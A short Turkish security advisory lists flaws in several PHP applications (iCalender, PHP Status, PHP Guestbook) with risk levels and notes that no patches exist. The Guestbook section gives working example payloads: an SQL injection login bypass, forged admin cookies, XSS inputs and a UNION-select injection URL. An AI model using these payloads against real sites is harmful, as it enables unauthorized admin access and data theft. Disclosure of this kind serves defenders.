PHP Güvenlik Açıkları ve Çözümleri
En çok kullanılan Web Programlama dillerinden birisi olan PHP yazılımlarında üst üste gelen güvenlik açıkları ve çözümleri hakkında bilgilere ulaşabileceğiniz bir güvenlik dökümanı yazmak istedim.
Son zamanlarda çıkan PHP Açıklarını sırasıyla yazıyorum ;
PHP iCalender Uzaktan Kod Çalıştırma Güvenlik Açığı ;
Risk : Yüksek
Etki : Uzaktan kod çalıştırma
Bilgi : Template.php sayfasında bulunan kodlama hataları yüzünden kullanıcılar hacker’larin saldırısına uğramaktadır.
Çözüm: Şu an için bir yama çıkarılmamıştır. Kullanıcıların bir üst sürümleri kullanmasını öneririm.
PHP Status Çoklu Güvenlik Açığı ;
Risk : Normal
Etki : Cross site scripting
Bilgi : Açık çoklu işlemektedir. “ Check.php “ dosyasında meydana gelen kodlama hatalarından dolayı kullanıcılar ve siteler Username kısmına yazılacak olan SQL kodları ile ataklara maruz kalmaktadırlar.
Çözüm : Şu an için bir yama çıkarılmamıştır.
PHP Guestbook Çoklu Güvenlik Açıkları ;
Risk : Yüksek
Etki : Uzaktan Kod Çalıştırma, SQL ataklarına olanak verme
Bilgi : “check.php” parametresindeki kodlama hataları SQL ataklar yapılabilir. Ayrıca yine “check.php” de Cookie açığı bulunmuştur. Bu açık sayesinde saldırganlar site şifrelerini ele geçirebilirler.
Exploit ( Örnek saldırı kodları ) :
1. Authentication Bypass
a) SQL Injection
url: http://host/hg/admin.php
Username: ' or 1/*
Password: any
b) Cookie based authentication
Cookie: loged=yes
Cookie: username=admin
Cookie: user_level=1
2. Cross-Site Scripting Example.
Url: http://host/hg/sign.php
Location: <XSS>
Website: javascript:alert(123)
Message: <XSS>
3. SQL Injection Example:
http://host/hg/admin/edit_smilie.php? id=333'% 20union%20select% 201,2,3,4/*
Çözüm : Şu an için bir çözüm yoktur.
Yazar: Onur OKTAY (SnB)